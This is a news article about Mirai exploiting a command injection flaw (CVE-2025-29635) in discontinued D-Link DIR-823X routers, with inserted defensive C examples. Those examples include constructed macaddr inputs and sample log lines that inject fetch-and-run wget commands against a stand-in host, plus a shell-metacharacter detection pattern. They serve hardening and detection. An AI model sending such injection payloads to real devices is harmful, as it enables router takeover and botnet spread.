Mirai Botnet Exploits CVE-2025-29635 in Discontinued D-Link Routers to Deploy Global Malware Campaign

Introduction

A newly observed cyber campaign is targeting outdated network infrastructure, turning forgotten hardware into active entry points for large-scale botnet operations. Security researchers have confirmed that the Mirai botnet has begun exploiting a command injection vulnerability tracked as CVE-2025-29635, affecting discontinued D-Link DIR-823X routers. The flaw, rooted in improper input validation, allows attackers to execute system-level commands remotely through crafted requests. What makes this case particularly concerning is not just the vulnerability itself, but the timing of exploitation, emerging long after public disclosure and proof-of-concept availability. This signals a recurring pattern in cybercrime ecosystems where legacy devices become long-term attack surfaces, especially when vendors discontinue support while organizations fail to decommission or patch them.

Details of the Incident

The Mirai botnet has been actively exploiting a critical command injection vulnerability, CVE-2025-29635, in D-Link DIR-823X routers that have reached end-of-life status.
The affected firmware versions are 240126 and 240802; both mishandle attacker-controlled input values.
The flaw stems from missing validation of the macaddr parameter, which is inserted directly into a system command without sanitization.
Attackers exploit it by sending specially crafted POST requests to the /goform/set_prohibiting endpoint.
Once the request is processed, the injected commands execute on the device, giving the attacker remote code execution.
Akamai's Security Intelligence and Response Team (SIRT) detected the activity in March 2026 through its global honeypot network.
This is the first real-world exploitation observed since the vulnerability was publicly disclosed in March 2025.
Security researchers Wang Jinshuai and Zhao Jiangting reverse-engineered the firmware and identified the vulnerable function, sub_42232C.
They confirmed that snprintf builds the command string from the unsanitized macaddr value and that the result is passed to system().
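The following C is an added illustration, not code from the D-Link firmware or from the researchers' write-up: all the page says about sub_42232C is that it builds a command with snprintf and runs it with system(). The command format string, buffer sizes and function names here are assumptions. It shows the vulnerable shape beside two hardened forms, strict positive validation of macaddr and an argv built for execve() so that no shell ever parses the value, and it also illustrates the point made later in the commentary that one reachable system() call with attacker input is enough for full compromise.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Assumption: the real format string inside sub_42232C is not on the page;
 * this one only stands in for "a shell command that embeds macaddr". */
#define BLOCK_CMD_FMT "ebtables -A FORWARD -s %s -j DROP"

/* Vulnerable pattern as described: the request's macaddr value is formatted
 * straight into a command buffer that the firmware then hands to system().
 * The buffer is returned instead of executed so the result can be inspected. */
const char *build_block_cmd_unsafe(const char *macaddr)
{
    static char cmd[256];
    snprintf(cmd, sizeof cmd, BLOCK_CMD_FMT, macaddr);
    return cmd;                      /* original code: system(cmd); */
}

/* Positive validation: exactly six hex pairs separated by colons. Anything
 * else, including a valid MAC followed by ";wget ...", is rejected. */
int is_valid_macaddr(const char *s)
{
    if (s == NULL || strlen(s) != 17)
        return 0;
    for (int i = 0; i < 17; i++) {
        if (i % 3 == 2) {
            if (s[i] != ':') return 0;
        } else if (!isxdigit((unsigned char)s[i])) {
            return 0;
        }
    }
    return 1;
}

/* Hardened variant 1: same snprintf/system() shape, but refuses any macaddr
 * that does not match the strict format, so no shell metacharacter can reach
 * the command line. Returns NULL on rejection. */
const char *build_block_cmd_safe(const char *macaddr)
{
    static char cmd[256];
    if (!is_valid_macaddr(macaddr))
        return NULL;
    snprintf(cmd, sizeof cmd, BLOCK_CMD_FMT, macaddr);
    return cmd;
}

/* Hardened variant 2: avoid the shell entirely. Build an argv for
 * fork()+execve() so the MAC is one argument that no shell interprets.
 * Returns NULL on rejection. */
const char **block_argv(const char *macaddr)
{
    static char mac[18];
    static const char *argv[8];
    if (!is_valid_macaddr(macaddr))
        return NULL;
    strcpy(mac, macaddr);            /* length already checked: 17 + NUL */
    argv[0] = "ebtables"; argv[1] = "-A"; argv[2] = "FORWARD";
    argv[3] = "-s";       argv[4] = mac;  argv[5] = "-j";
    argv[6] = "DROP";     argv[7] = NULL;
    return argv;
}

/* True when a string contains characters a POSIX shell treats as a command
 * separator or substitution: the injection check used in the demo below. */
int has_shell_metachar(const char *s)
{
    return s != NULL && strpbrk(s, ";|&`$\n") != NULL;
}

int main(void)
{
    /* Constructed inputs; the IP is from TEST-NET-3, not a real dropper host. */
    const char *benign  = "00:11:22:33:44:55";
    const char *hostile = "00:11:22:33:44:55;wget http://203.0.113.7/x -O /tmp/x;sh /tmp/x";

    printf("unsafe : %s\n", build_block_cmd_unsafe(hostile));
    printf("safe   : %s\n", build_block_cmd_safe(hostile) ? "ACCEPTED" : "rejected");
    printf("safe   : %s\n", build_block_cmd_safe(benign));
    printf("argv[4]: %s\n", block_argv(benign)[4]);
    return 0;
}
```

Validation alone closes this bug, but the argv form is the one to prefer in new firmware code: it removes the shell from the path, so a future parameter that someone forgets to validate cannot become a second command either.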
A proof-of-concept exploit was later published on GitHub and subsequently removed.
At the time of Akamai's discovery, the vulnerability had not been added to CISA's Known Exploited Vulnerabilities catalog.
The attackers' requests follow the same structure as the published PoC, indicating that it was reused to automate exploitation.
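As an added example, not taken from Akamai's report or its YARA rules, here is a small detector in C run over constructed request log lines: it flags POSTs to /goform/set_prohibiting whose macaddr field, after percent-decoding, contains shell metacharacters, which is the shape of the exploit requests described above. The one-line log format and the IP addresses are constructed for the example; a real honeypot or reverse-proxy log would need its own field extraction in front of the same check.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Constructed sample, not real captures: "<client> <method> <path> <body>".
 * Client and dropper addresses are from TEST-NET-3. */
static const char *SAMPLE_LOG[] = {
    "203.0.113.10 POST /goform/set_prohibiting macaddr=00:11:22:33:44:55",
    "203.0.113.11 POST /goform/set_prohibiting macaddr=00:11:22:33:44:55;wget http://203.0.113.7/t.sh -O /tmp/t;sh /tmp/t",
    "203.0.113.12 POST /goform/set_prohibiting macaddr=00%3A11%3A22%3A33%3A44%3A55%3Bcd+/tmp%3Bwget+http%3A%2F%2F203.0.113.7%2Ftux%3Bchmod+777+tux%3B.%2Ftux",
    "203.0.113.13 GET /index.html",
    "203.0.113.14 POST /goform/set_prohibiting macaddr=00:11:22:33:44:55&enable=1",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode one form field (also '+' -> ' ') into dst, stopping at the
 * end of the field: '&', whitespace or NUL. Returns the length written. */
static size_t decode_field(const char *src, char *dst, size_t n)
{
    size_t o = 0;
    while (*src && *src != '&' && !isspace((unsigned char)*src) && o + 1 < n) {
        if (*src == '%' && hexval(src[1]) >= 0 && hexval(src[2]) >= 0) {
            dst[o++] = (char)(hexval(src[1]) * 16 + hexval(src[2]));
            src += 3;
        } else if (*src == '+') {
            dst[o++] = ' ';
            src++;
        } else {
            dst[o++] = *src++;
        }
    }
    dst[o] = '\0';
    return o;
}

/* 1 if the line is a POST to /goform/set_prohibiting whose decoded macaddr
 * value contains a shell separator or substitution character, else 0.
 * Decoding first matters: the exploit traffic encodes ';' as %3B. */
int is_set_prohibiting_injection(const char *line)
{
    char mac[512];
    const char *p;
    if (strstr(line, "POST") == NULL || strstr(line, "/goform/set_prohibiting") == NULL)
        return 0;
    p = strstr(line, "macaddr=");
    if (p == NULL)
        return 0;
    decode_field(p + 8, mac, sizeof mac);
    return strpbrk(mac, ";|&`$\n") != NULL;
}

int count_injection_attempts(const char *const *lines, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += is_set_prohibiting_injection(lines[i]);
    return hits;
}

/* Runs the detector over the constructed sample. */
int count_sample_injections(void)
{
    return count_injection_attempts(SAMPLE_LOG, SAMPLE_LOG_LEN);
}

int main(void)
{
    for (size_t i = 0; i < SAMPLE_LOG_LEN; i++)
        printf("%s  %s\n", is_set_prohibiting_injection(SAMPLE_LOG[i]) ? "ALERT " : "ok    ", SAMPLE_LOG[i]);
    printf("%d injection attempt(s)\n", count_sample_injections());
    return 0;
}
```

Matching on metacharacters in the decoded value, rather than on a specific download command, keeps the rule independent of whichever dropper URL or binary name the campaign rotates to; the IoCs from the report then serve as a second, more specific layer.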
The injected payloads are shell commands that download and execute a second-stage binary from attacker infrastructure.
The dropped malware is a Mirai variant known as "tuxnokill."
It is served from an external IP address and is built for multiple CPU architectures.
Its strings are XOR-encoded with a fixed key, a technique inherited from the Mirai source and intended to hinder static detection.
The binary contains the standard Mirai strings consistent with known botnet behavior.
It connects to a command-and-control server on port 44300.
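An added triage example, not from the report: recovering a fixed single-byte XOR key from a Mirai-style encoded string table by brute force against a known Mirai string. The blob below is constructed by encoding "/bin/busybox" and "/dev/watchdog" with 0x22, which is the effective byte of the leaked source's default table key (0xdeadbeef, applied as four successive byte-wise XORs). Whether tuxnokill uses that key is an assumption, which is why the code recovers the key rather than assuming it; in practice the blob would be the encoded table carved from the sample's data section.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Constructed sample blob: two NUL-terminated entries, "/bin/busybox" and
 * "/dev/watchdog", each byte XORed with 0x22. Not bytes from a real sample. */
static const unsigned char SAMPLE_BLOB[] = {
    0x0d,0x40,0x4b,0x4c,0x0d,0x40,0x57,0x51,0x5b,0x40,0x4d,0x5a,0x22,
    0x0d,0x46,0x47,0x54,0x0d,0x55,0x43,0x56,0x41,0x4a,0x46,0x4d,0x45,0x22,
};
#define SAMPLE_BLOB_LEN (sizeof SAMPLE_BLOB)

/* Decode blob with a single-byte key into out: printable bytes are kept,
 * everything else (including the NUL separators) is shown as '.'. */
void xor_decode(const unsigned char *blob, size_t n, unsigned char key,
                char *out, size_t outn)
{
    size_t i;
    for (i = 0; i < n && i + 1 < outn; i++) {
        unsigned char c = blob[i] ^ key;
        out[i] = isprint(c) ? (char)c : '.';
    }
    out[i] = '\0';
}

/* Try all 256 single-byte keys; return the first whose decoding contains the
 * known plaintext, or -1 if none does. A known Mirai string such as
 * "/bin/busybox" is the usual crib. */
int recover_xor_key(const unsigned char *blob, size_t n, const char *known)
{
    char buf[1024];
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    for (int k = 0; k < 256; k++) {
        xor_decode(blob, n, (unsigned char)k, buf, sizeof buf);
        if (strstr(buf, known) != NULL)
            return k;
    }
    return -1;
}

/* Recovers the key for the constructed sample and decodes the whole blob
 * into out. Returns the key, or -1 if the crib was not found. */
int decode_sample(char *out, size_t outn)
{
    int key = recover_xor_key(SAMPLE_BLOB, SAMPLE_BLOB_LEN, "/bin/busybox");
    if (key < 0)
        return -1;
    xor_decode(SAMPLE_BLOB, SAMPLE_BLOB_LEN, (unsigned char)key, out, outn);
    return key;
}

int main(void)
{
    char text[128];
    int key = decode_sample(text, sizeof text);
    if (key < 0) {
        puts("crib not found under any single-byte key");
        return 1;
    }
    printf("key 0x%02x: %s\n", key, text);
    return 0;
}
```

The same loop works for any variant that keeps the single-byte scheme; if the crib is never found, the builder has changed the obfuscation (a multi-byte key or a different cipher) and that absence is itself a useful triage result.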
Indicators suggest the campaign is partly hand-built rather than fully automated.
The attackers also chain other exploits, including CVE-2023-1389 (a command injection in TP-Link Archer AX21 routers) and vulnerabilities in ZTE devices.
Mirai remains widely used because its source code was leaked in 2016 and is freely available.
This lowers the technical barrier for criminals entering botnet operations.
Even inexperienced actors can run functional malware campaigns using modified builds.
Some groups are experimenting with artificial intelligence to assist vulnerability discovery.

Others reject AI and prefer traditional exploit-development techniques.

Security experts highlight that outdated infrastructure remains a primary target for such campaigns.

Organizations frequently fail to patch or replace discontinued devices.

This creates long-term exposure windows that attackers actively exploit.

Akamai emphasizes timely patching and vulnerability monitoring.
Its report includes IoCs and YARA rules to assist defenders with detection and mitigation.

What Undercode Say:

The exploitation of CVE-2025-29635 demonstrates a classic lifecycle of modern cyber threats, where disclosure does not immediately lead to mitigation. Instead, there is often a delayed but inevitable wave of exploitation once proof-of-concept code becomes publicly available. In this case the gap between disclosure and observed exploitation was roughly one year, showing that attackers can afford to wait for the ecosystem to lag behind.
Mirai’s continued relevance also reveals a deeper structural issue in cybersecurity, which is the persistence of vulnerable embedded systems in production environments long after official support ends.
Routers like the D-Link DIR-823X series become silent liabilities inside networks, often forgotten but still connected.
Attackers do not need sophisticated zero-day exploits when legacy infrastructure already provides a wide attack surface.
The simplicity of command injection vulnerabilities makes them particularly dangerous in embedded systems.
Once system() execution is possible, full device compromise becomes trivial.
The reuse of PoC code from public repositories accelerates exploitation cycles significantly.
Even if PoCs are removed later, they often persist across mirrors and underground forums.
Mirai’s architecture remains attractive because it is modular, lightweight, and easily customizable.
The addition of multiple exploits in a single campaign suggests coordinated threat actor behavior rather than isolated opportunistic attacks.
The inclusion of ZTE and TP-Link vulnerabilities alongside D-Link devices indicates a broad targeting strategy.
This reflects an ecosystem-level approach to botnet expansion rather than single-vendor focus.
The use of XOR encoding and hard-coded infrastructure suggests partially manual malware development.

This contradicts assumptions that modern botnets are fully automated.

Instead, hybrid models combining automation and manual control are becoming more common.
The involvement of AI in vulnerability research is still uneven across threat actors.
Some groups are clearly experimenting, while others rely on traditional reverse engineering.
The biggest weakness exploited here is not only software but operational negligence in device lifecycle management.

Organizations often fail to track firmware support timelines.

End-of-life devices remain active in enterprise networks longer than expected.

This creates invisible entry points for attackers.

The Mirai ecosystem continues to evolve by absorbing new vulnerabilities rapidly.
Each newly disclosed flaw becomes potential fuel for botnet expansion.
Defensive strategies must therefore focus on asset visibility as much as patching.

Without inventory awareness, mitigation efforts remain incomplete.

The report reinforces that vulnerability disclosure alone is insufficient.

Active monitoring and enforcement of decommissioning policies are essential.

Cybersecurity maturity is increasingly defined by how quickly organizations remove obsolete technology.
The persistence of Mirai shows that old threats do not disappear; they simply adapt.
This campaign is a reminder that legacy infrastructure is now a permanent battlefield in global cyber operations.

Fact Checker Results

CVE-2025-29635 is confirmed as a command injection vulnerability affecting D-Link DIR-823X routers. ✅

Akamai SIRT observed real-world exploitation through honeypot detection in March 2026. ⚠️

Mirai botnet continues to operate due to widespread reuse of leaked source code. ✅

Prediction

The exploitation of CVE-2025-29635 is likely to expand as exploit code circulates further in underground markets and botnet operators integrate it into automated scanning tools.
Older router models will continue to be primary targets because they remain widely deployed despite end-of-life status.
Future Mirai variants will likely combine multiple router and IoT exploits into unified mass-infection campaigns, increasing both speed and scale of global infections.

References:

Reported By: securityaffairs.com